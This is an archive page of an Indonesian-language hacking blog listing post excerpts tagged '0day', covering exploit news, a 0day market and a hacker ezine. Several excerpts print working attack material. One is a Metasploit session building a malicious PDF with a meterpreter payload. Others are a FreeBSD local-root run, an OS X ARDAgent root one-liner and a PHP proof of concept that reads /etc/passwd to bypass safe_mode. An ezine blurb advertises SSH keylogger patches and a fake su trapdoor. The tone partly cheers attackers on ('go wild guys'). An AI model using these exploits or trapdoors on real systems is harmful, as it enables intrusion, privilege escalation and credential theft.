Currently Browsing: 0day

Zero Day – MC Frontalot

They take the world over one node at a time. They put the seed in some software and make it shine. so the dimwitted among us grab tight and install put it right on the wall, and don’t notice at all that the celebration of a day impends. I want to note it on the calendar, I ready my pen, I get ahead of my friends in my haste, I let slip that the zero day is coming, MC Front still ill equipped. Boom how it hits you, when it comes if you’re touching on an interface you steady your thumbs since you might have to jump ship quick, the sting stuns it isn’t designed to destroy, it’s just how it runs and I sing fun songs but this here is a warning that the exploit’s open and it might sound corny but I give a damn about the state of the Earth expect a hacker has to wreck it just to teach it what it’s worth. And on the first day, it’s already too late… Press play, prepare as history is made: “largest hack in one day,” all the headlines will say. All out of time, hear the chime from the buzzer. Found this bug on my own, no need for a fuzzer. “It’s already too late,” spreading as we planned. No need for the NO OPs, I know just where to land. Clearing out the registers, with pointers to my functions, loaded to your memory and writing new instructions. Braindump i/o, siphoned out the eye holes; enticed so i’m digging through the disassembled byte code. Push pop change order stack frame FILO filesystem inodes, all fall to my flow. Running over, there again i go: self-propagation engine, polymorphic sideshow. Every network, we’re found to get around… the exploit payload encoded in this sound. Man, cousin, I’m about...
Read More of Zero Day – MC Frontalot

Twitter and Adobe 0.9-day spl0it

Salah satu artis yang terkenal dengan istilah ‘bechek’-nya pernah bilang dalam salah satu sesi wawancara untuk “acara televisi full of non-sense but terribly popular” (attention: something called infoblabla) bahwa twitter, facebook, friendster itu gak ada gunanya. Do’i gak mungkin ikutan begituan karena terlalu sibuk dengan skull, corse, blablabla. Dan yang ikutan begituan (attention: geek said, social networking) hanya orang-orang yang gak punya kerjaan. Well, somehow, this cute little girl *heh??* probably right. Unfortunately, gak semua orang update status untuk hal-hal yang tidak perlu. Komunitas security umumnya seringkali memposting hal-hal yang bermanfaat, dan lebih cepat mendapatkan informasi tersebut dibandingkan menunggu muncul di blog, news, forum, dll. Beberapa hal menarik diantaranya diskusi kecil-kecilan mengenai bug dan expl0it. Baru-baru ini merebak mengenai adobe acrobat reader 0day, salah satu yang membahas bisa lihat di http://bit.ly/7UjG26. HDM dalam twitter nya pernah meminta contoh exploit tersebut bagi siapa saja yang memilikinya, dan dalam waktu singkat contoh 0day sploit tersebut didapatkan, copy nya bisa di download dari http://bit.ly/5VqgVv. Dan tentu saja dalam beberapa jam exploit tersebut muncul dalam repo metasploit, let’s give it a try: Snow $ sudo ./msfconsole Password: 888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 =[ metasploit v3.3.3-dev [core:3.3 api:1.0] + -- --=[ 476 exploits - 220 auxiliary + -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7893 updated today (2009.12.16) msf > version Framework: 3.3.3-dev.7817 Console : 3.3.3-dev.7855 msf > use windows/fileformat/adobe_media_newplayer msf exploit(adobe_media_newplayer) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(adobe_media_newplayer) > set RHOST 172.16.30.129 RHOST => 172.16.30.129 msf exploit(adobe_media_newplayer) > exploit [*] Started bind handler [*] Creating 'msf.pdf' file... [*] Generated...
Read More of Twitter and Adobe 0.9-day spl0it

FreeBSD rtld 0day exploit

King Cope publish local exploit ini ke FD-Lists. [[email protected] ~/hack]$ uname -a FreeBSD begok.xxxx.de 7.0-STABLE FreeBSD 7.0-STABLE #1: Fri Mar 27 11:24:51 WIT 2009 [email protected]:/usr/obj/usr/src/sys/BEGOK i386 [[email protected] ~/hack]$ ./fbsd-local-2009.sh fbsd-local-2009.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' 8:35 /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1007(bofh) gid=1007(bofh) euid=0(root) groups=1007(bofh) Publikasi ini jelas akan langsung dimanfaatkan dengan cepat oleh para hacker/cracker yang bisa mendapatkan akses local ke mesin-mesin FreeBSD. Rasanya belum ada patch untuk saat ini. So, go wild guys? :p. ** Thanks buat temon untuk testing exploitnya, as currently I don’t have FBSD to test....
Read More of FreeBSD rtld 0day exploit

CVE-2009-2692 (Linux NULL pointer dereference)

Tavis Ormandy mengeluarkan advisories mengenai NULL pointer dereference vulnerability pada implementasi socket untuk kernel Linux 2.6 dan 2.4. Full advisoriesnya dapat dilihat pada FD-list. Spender dari grsecurity project merilis exploit untuk bug ini dengan memanfaatkan pulseaudio seperti rilis exploit sebelumnya. Jadi jika ada yang memiliki server dengan pulseaudio versi lama dan belum di patch, serta mengaktifkan modul-modul yang vulnerable terhadap hole ini, sebaiknya melakukan uji coba terhadap server tersebut, paling tidak dengan exploit spender yang kemungkinan besar akan digunakan begitu saja oleh script kiddies. Uninstall pulseaudio jika tidak digunakan, atau merubah pathnya dari default mungkin akan mengurangi dampak serangan para script kiddies. Beberapa tindakan pencegahan dapat dilakukan, namun yang pasti SELinux tidak dapat menolong banyak karena pada exploit ini terdapat implementasi untuk bypass SELinux :). ~...
Read More of CVE-2009-2692 (Linux NULL pointer dereference)

ZFO #5 Released

Menjelang Security Conference BlackHat 2009 di Las Vegas, ZFO memberi sambutan yang cukup hangat dengan me-release Ezine mereka yang ke-5. Salah satu mirror-nya bisa di lihat disini. Seperti-nya gerakan para Undergrounders seperti 5-6 tahun yang lalu bakal mulai terulang. Seruu…....
Read More of ZFO #5 Released

Matasano is Pwned

Jika dilihat dari log yang mereka tuliskan dihalaman deface sepertinya lagi-lagi hasil dari 0day openssh. Log lengkapnya bisa dilihat dari FD-List. Potongan screenshot bisa dilihat dari sini. Thanks cybertank yang masih sempat ambil screenshot nya...
Read More of Matasano is Pwned

OSAscript/setuid root

$ osascript -e ‘tell app “ARDAgent” to do shell script “whoami”‘ root Simple, tapi critical. Untuk yang menggunakan OS X dan masih mendapatkan response dari shell seperti diatas ada baiknya mengikuti workaround dari http://www.tuaw.com/ardfix/. Walaupun banyak pendapat yang mengatakan bugs ini butuh ‘physical access’, tapi tetap saja setuid root vulnerability ini bisa jadi jalan masuk trojan melalui web, yang pasti bisa melakukan banyak hal tanpa...
Read More of OSAscript/setuid root

ToKeT Volume 3, Happy New Years Hackers!

Hail hackers, getting drunk last night?enjoy the party?following to count-down the silly clock?c’mon, whatever you did New TokET (Volume 3) of Kecoak Elektronik Indonesia is available for you as 2008’s new years present. Here’s some of our special menu: [*] The Art of Beeing Invisible – ByteKrew Kreatifitas pemasangan backdoor dan keylog untuk keperluan massive gaining server. Stealth – anonym backdooring dengan kombinasi penjelasan konsep dan teknikal. [*] Perkenalan Terhadap Insiden – BytesKrew Pengenalan terhadap insiden cyber dan bagaimana merespon sebuah insiden serta membangun pertahanan dan system logging untuk meminimalkan resiko sebuah insiden. [*] Fuzzer dan Teknologi Security – Cyb3rh3b Otomatisasi pencarian flaw pada suatu aplikasi menggunakan fuzzer. Pembahasan dari konsep fuzzer sederhana diteruskan ke fuzzer public release. [*] SSH Client keylogger patch – BytesKrew Modifikasi ssh client OpenSSH 3.9p1 OpenSSH 4.5p1 dan OpenSSH 4.7p1 untuk keperluan keylogging username dan password outgoing login SSH. [*] Keylogging Root Password with Evil su – csh Trapdoor menggunakan fake su command. Get the password – compromise the root. Grab the complete links from...
Read More of ToKeT Volume 3, Happy New Years Hackers!

Roberto Preatoni dan WabiSabi Labi

Well…WabiSabi Labi, industri baru yang dibungkus dengan nuansa dan inovasi baru sebagai tempat penjualan 0day sepertinya harus menunda pesta meriahnya. Roberto Preatoni, salah satu co-founder dan direktur strategi perusahaan ini plus founder dari Zone-H ditangkap di italy atas kasus skandal berupa penyadapan terhadap Telecom Italy. Penangkapan preatoni tidak ada sangkut pautnya dengan pasar jual-beli 0day tersebut, preatoni ditangkap berhubungan dengan pekerjaannya sebagai security consultant. Telecom italy menggunakan tenaga preatoni beserta “tiger team”-nya sebagai security expert untuk melakukan proses penetration testing terhadap tingkat security IT perusahaan tersebut. Namun anggota tiger team ini ketahuan memasang trojan horse dan melakukan penyadapan data-data rahasia terhadap sejumlah orang penting, diantaranya CEO dari Brazil Telecom. Preatoni diduga membantu proses setting-up aksi skandal ini saat sedang melakukan pekerjaannya sebagai security consultant. Aksi skandal ini memang tidak berhubungan dengan WabiSabi Labi, namun secara tidak langsung akan berpengaruh pada kredibilitas market tersebut. Konsep WabiSabi Labi sebenarnya tidak jauh berbeda dengan perusahaan-perusahaan seperti 3Com, iDefense, Immunity yang membayar *researcher* untuk menyediakan 0day. Namun industri-industri tersebut umumnya membeli exploit untuk kemudian dilaporkan kepada vendor yang bersangkutan, dengan kata lain industri-industri tersebut bisa menjadi media/jembatan antara pihak yang menemukan vulnerability suatu aplikasi dengan vendor yang memproduksi aplikasi tersebut, dan tentu saja ada imbalan yang akan diberikan kepada si penemu vulnerability untuk jerih payahnya melakukan riset dalam menemukan bugs (fuzzer, hunneh?!). WabiSabi Labi merupakan industri yang membuka pasar secara lebih terbuka, dalam arti…jika kamu memiliki sebuah 0day, maka kamu bisa menjualnya melalui WabiSabi Labi dan ditawarkan kepada pembeli secara bebas (aha, teringat dengan pasar darknet?), siapapun bisa membayar untuk exploit tersebut. Dan mekanismenya bahkan lebih eksklusif, yaitu pembeli 0day bisa menentukan eksklusifitas-nya dimana WabiSabi Labi tidak akan menjual 0day tersebut kepada pihak lain, jadi hanya pembeli eksklusif itulah yang memiliki 0day itu. Hal lain nya?WabiSabi Labi juga akan menjadi vendor penyedia produk IDS (Intrusion Detection System) yang bekerja sama dengan produsen hardware...
Read More of Roberto Preatoni dan WabiSabi Labi

Safe mode PHP and apache chroot bypass

Someone /at/ kecoak elektronik just lost his private 0day, the 0day technique to bypass safemode php and apache chroot using mysql has been leaked and publish on public disclosure site. No need to keep it anymore, so he just released the PoC to the public: ——————- Cut here ———————— <?php /* It has been a while i make this exploit to be a private collection I use this exploit to bypass : – Safe_mode PHP all version – By default install apache in OpenBSD 3.x (dunno exactly) is chroot in /var/www/ Tested : Ubuntu 6.06 – Fedora Core 5 – OpenBSD 3.9 By : Someone [at] k-elektronik */ echo “safe_mode = ” . ini_get(‘safe_mode’) . “n”; $conn = mysql_connect(“localhost”, “root”, “rahasia”); $result = mysql_query(“select load_file(“/etc/passwd”) as password”); while($row = mysql_fetch_object($result)) echo $row->password; ?> ——————- Cut here ———————— Just play around do_system() function to get the system command executed. Take the vi and put those function on ur...
Read More of Safe mode PHP and apache chroot bypass